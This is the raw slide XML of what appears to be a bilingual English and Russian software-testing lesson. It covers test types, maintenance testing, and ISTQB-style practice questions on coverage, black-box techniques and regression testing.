            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Тестирование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>в период сопровождения затруднено, если технические требования являются устаревшими или отсутствуют вообще, либо </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>тестировщики</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> не обладают достаточными знаниями предметной области.</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3</a:t>
            </a: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requirements would be tested by a functional system test?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A The system must be able to perform its functions for an average of 23 hours 50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>per day.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>B The system must perform adequately for up to 30 users.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>C The system must allow a user to amend the address of a customer.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>D The system must allow 12,000 new customers per year.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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Considering the following pseudo-code, calculate the MINIMUM number of test cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>for statement coverage, and the MINIMUM number of test cases for decision </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>coverage respectively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>READ A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>READ B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>READ C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IF C&gt;A THEN</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IF C&gt;B THEN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"C must be smaller than at least one number"</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ELSE PRINT "Proceed to next stage“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   ENDIF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ELSE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"B can be smaller than C"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ENDIF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A 3, 3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>B 2, 3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>C 2, 4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>D 3, 2.</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The following statements are used to describe the basis for creating test cases using either</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>black or white box techniques:</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information about how the software is constructed.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ii models of the system, software or components.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iii analysis of the test basis documentation.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iv analysis of the internal structure of the components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Which combination of the statements describes the basis for black box techniques?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A ii and iii.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>B 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Which of following statements is true? Select ALL correct options.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Regression testing should be performed:</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once a month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ii when a defect has been fixed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iii when the test environment has changed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iv when the software has changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A ii and iv.</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iii.</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baseline="0" dirty="0" smtClean="0"/>
              <a:t>How many eggs can be taken on an empty stomach?</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369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Describe and perform smoke tests for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ListBoxer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t> program</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1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Remember the terms from the lesson:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Regression testing, security testing, performance testing, stress testing, load testing, volume testing, white-box testing, black-box testing, smoke testing, usability testing, functional testing</a:t>
            </a:r>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785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>What are the characteristics of good testing in any lifecycle model?</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difference between verification and validation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>What has lower independence level: alpha or beta testing? Why do you think so?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>Which software development model “Scrum” and “Extreme Programming”  methodologies are related to?</a:t>
            </a:r>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5282128" y="1700808"/>
            <a:ext cx="3106296" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Maintenance Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259632" y="1712098"/>
            <a:ext cx="1425518" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Testing Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Flowchart: Connector 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4977189"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71600"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12" name="Рисунок 11" descr="сопровождение.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004048" y="2613645"/>
            <a:ext cx="2857500" cy="1895475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Рисунок 14" descr="тесты.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062797" y="2320088"/>
            <a:ext cx="2324888" cy="2405056"/>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9436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Types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A test type is focused on a particular test objective, which could be any of the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958767" y="25649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20888"/>
            <a:ext cx="4572000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A function to be performed by the software</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="303214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915652"/>
            <a:ext cx="5652120" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A non-functional quality characteristic, such as reliability or usability </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="37522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635732"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The structure or architecture of the software or system </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="419530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Прямоугольник 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224136" y="4078813"/>
            <a:ext cx="6228184" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Change related, i.e. confirming that defects have been fixed (confirmation testing) and looking for unintended changes (regression testing) </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8423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of Function (Functional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functions are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>“what”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the system does.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Functional testing types are based on examination of external (front-end) system behavior </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>(black box testing)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
